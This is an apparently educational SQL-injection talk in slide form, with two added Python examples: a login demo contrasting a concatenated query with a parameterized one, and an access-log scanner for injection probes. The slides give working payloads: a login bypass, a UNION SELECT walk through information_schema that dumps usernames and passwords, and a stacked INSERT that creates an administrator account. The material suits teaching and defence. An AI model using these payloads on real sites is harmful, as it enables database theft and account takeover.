1. How Did I Steal Your Database. Mostafa Siraj, Application Security Expert
2. DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
4. What is a Database? A collection of tables (Users, Orders, Countries, etc.); each table is a collection of rows and columns.
5. What is SQL? A query language for interacting with the database. SQL can: retrieve data from the database; insert new records into the database; delete records from the database; update records in the database.
6. SQL Queries. To get all data about the username elprince: SELECT Username, Password, First_Name, Last_Name FROM Users WHERE Username='elprince'. Gives a result:
7. FACT. Amongst Codd's rules for a relational database: metadata must be stored in the database just as regular data is.
8. SQL Injection is a technique where an attacker creates new SQL commands or alters existing ones, in order to: expose hidden data (e.g. steal all the records from the tables); override data (e.g. the administrator's password); execute dangerous system-level commands on the database host.
9. SQL Injection Login Example. SELECT * FROM Users WHERE Username='username' AND Password='password'. If the user enters Elprince, Elprince123 the query becomes SELECT * FROM Users WHERE Username='Elprince' AND Password='Elprince123'
10. SQL Injection Example (cont.). Suppose the user enters ' OR 1=1--, 123; the query becomes SELECT * FROM Users WHERE Username='' OR 1=1--' AND Password='123'. The -- comments out everything after it, so the query actually executed is SELECT * FROM Users WHERE Username='' OR 1=1
11. This is not enough. You can refine the injection to log in with the administrator account. Enter ' OR 1=1 ORDER BY 1--, abc; the query becomes SELECT * FROM Users WHERE Username='' OR 1=1 ORDER BY 1--' AND Password='abc'
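The login example from these slides, as an added illustration that is not part of the original deck: a login function that builds its query by string concatenation (the pattern the slides attack) beside a parameterized version that hands the same input to the driver as data. The in-memory SQLite table and its two rows are constructed for the example; the bypass input is the slides' own ' OR 1=1--. Against the concatenated query it returns the first row in the table (here the constructed Administrator account, because no password check survives the comment); against the parameterized query it matches nothing.

```python
import sqlite3


def make_db():
    """Constructed sample data for the example: an in-memory Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT, IsAdmin INTEGER)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [("Administrator", "s3cret-admin", 1), ("Elprince", "Elprince123", 0)],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Query assembled from raw input, exactly as the slide's template does.

    With username = ' OR 1=1-- the text becomes
      SELECT Username FROM Users WHERE Username='' OR 1=1--' AND Password='...'
    and the comment marker removes the password check entirely.
    """
    sql = (
        "SELECT Username FROM Users WHERE Username='" + username
        + "' AND Password='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the values, so the quote and the
    comment marker are only ever compared against stored data, never parsed."""
    row = conn.execute(
        "SELECT Username FROM Users WHERE Username=? AND Password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the slide's payload through both implementations and return what each returns."""
    conn = make_db()
    payload = "' OR 1=1--"  # the login-bypass input from the slides
    return {
        "vulnerable": login_vulnerable(conn, payload, "123"),  # 'Administrator'
        "safe": login_safe(conn, payload, "123"),              # None
        "legit": login_safe(conn, "Elprince", "Elprince123"),  # 'Elprince'
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The fix is the placeholder in the second query, not any filtering of quotes: the same code stays correct no matter which characters the input contains, which is why parameterized statements are the standard mitigation rather than blacklists.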
12. Finding SQL Injection Bugs. Submit a single quotation mark and observe the result. Submit two single quotation marks and observe the result.
13. Finding SQL Injection Bugs. For multistage processes, complete all the stages before observing the results. For search fields, try the wildcard character %.
14. Finding SQL Injection Bugs. For numeric data, if the original value was 2, try submitting 1+1 or 3-1. If that succeeds, try SQL-specific keywords, e.g. 67-ASCII('A'). If single quotes are filtered, try 51-ASCII(1) [note: ASCII(1)=49].
15. Identify the database engine. The error messages reveal the DB engine. We can also guess the DB from the OS or web server (e.g. LAMP: Linux + Apache + PHP + ….).
16. Identify the database engine. Use engine-specific characters or commands. String concatenation differs between DB engines: '||'FOO (Oracle); '+'FOO (MS SQL Server); ' 'FOO (MySQL) [note the space between the two quotes].
29. The query in the backend is something like: SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. Any of the …. positions is a possible location for my input.
30. The Strategy. 1. Get the number of items after the SELECT statement. How many items are here? SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
31. The Strategy. 2. Identify the location of the STRINGS in the SELECT statement. Which of those are strings? SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
32. The Strategy. 3. Get the structure of the database: SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
33. The Strategy. 4. Get the data from the database: SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
34. The Strategy. 1. Get the number of items after the SELECT statement. 2. Identify the location of the STRINGS in the SELECT statement. 3. Get the structure of the database. 4. Get the data from the database.
44. 2. Identify the location of the STRINGS in the SELECT statement: 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
49. 3. Get the structure of the database: 1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL FROM information_schema.tables#
52. Next Queries. 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='USERS'# and then 1234') UNION SELECT NULL,NULL,NULL,username,password,NULL,NULL FROM users WHERE id<100# ……. Continue until you have all the tables.
68. Continued… After getting all of the columns I found a field called IsAdmin. That's my goal. Submitting the following query creates an admin account on the application: '; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES ('Administrator','******',TRUE,…..)
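A defender's counterpart to the probes in slides 12-14 and the UNION / information_schema queries in slides 44-68, added here as an example and not taken from the deck: a small scanner that decodes the query string of each access-log request and flags the fragments those slides rely on (quotes, trailing comment markers, UNION SELECT, information_schema, arithmetic substitutes for a number, ASCII()). The log lines are constructed for the example and the rule names are my own; the patterns are deliberately narrow so that each slide's probe can be seen as it appears on the wire, and a production deployment would tune them against real traffic.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not real traffic). Lines 3-6 carry the
# kinds of input the slides describe; lines 1-2 are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=laptop HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=2 HTTP/1.1" 200 731
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%2B1 HTTP/1.1" 200 731
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=67-ASCII(%27A%27) HTTP/1.1" 200 731
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item?id=1234%27)+UNION+SELECT+NULL,NULL,NULL,table_name,NULL,NULL,NULL+FROM+information_schema.tables%23 HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /login?user=%27+OR+1%3D1--&pass=123 HTTP/1.1" 302 0
"""

# Each rule names one tell-tale from the slides; applied to the decoded parameter value.
RULES = [
    ("quote_probe", re.compile(r"['\"]")),                    # slide 12: single / double quote
    ("comment_terminator", re.compile(r"(--|#)\s*$")),        # slides 10, 44-52: trailing -- or #
    ("union_select", re.compile(r"union\s+select", re.I)),     # slides 44-52
    ("schema_enumeration", re.compile(r"information_schema", re.I)),  # slides 49-52
    ("arithmetic_probe", re.compile(r"^\d+\s*[-+]\s*\d+$")),  # slide 14: 1+1, 3-1 in a numeric field
    ("ascii_function", re.compile(r"\bascii\s*\(", re.I)),     # slide 14: 67-ASCII('A')
]

# Common-log-format request line: client, then the request target.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return {client, path, hits} for one log line, or None if it does not parse.

    hits is a list of (parameter, rule_name) pairs, in RULES order per parameter."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.group(1), m.group(2)
    parts = urlsplit(target)
    hits = []
    # parse_qsl percent-decodes values and turns '+' into spaces, as the server would.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.append((name, rule))
    return {"client": client, "path": parts.path, "hits": hits}


def scan_log(text):
    """Scan every line and keep only requests that triggered at least one rule."""
    findings = []
    for line in text.splitlines():
        result = scan_line(line)
        if result and result["hits"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["path"], [r for _, r in f["hits"]])
```

The value of this as a detection is the sequence rather than any single hit: one client moving from a quote probe, to arithmetic substitution, to UNION SELECT against information_schema is the methodology the slides lay out, so alerting on that progression from one source is far more reliable than alerting on a lone apostrophe in a search box.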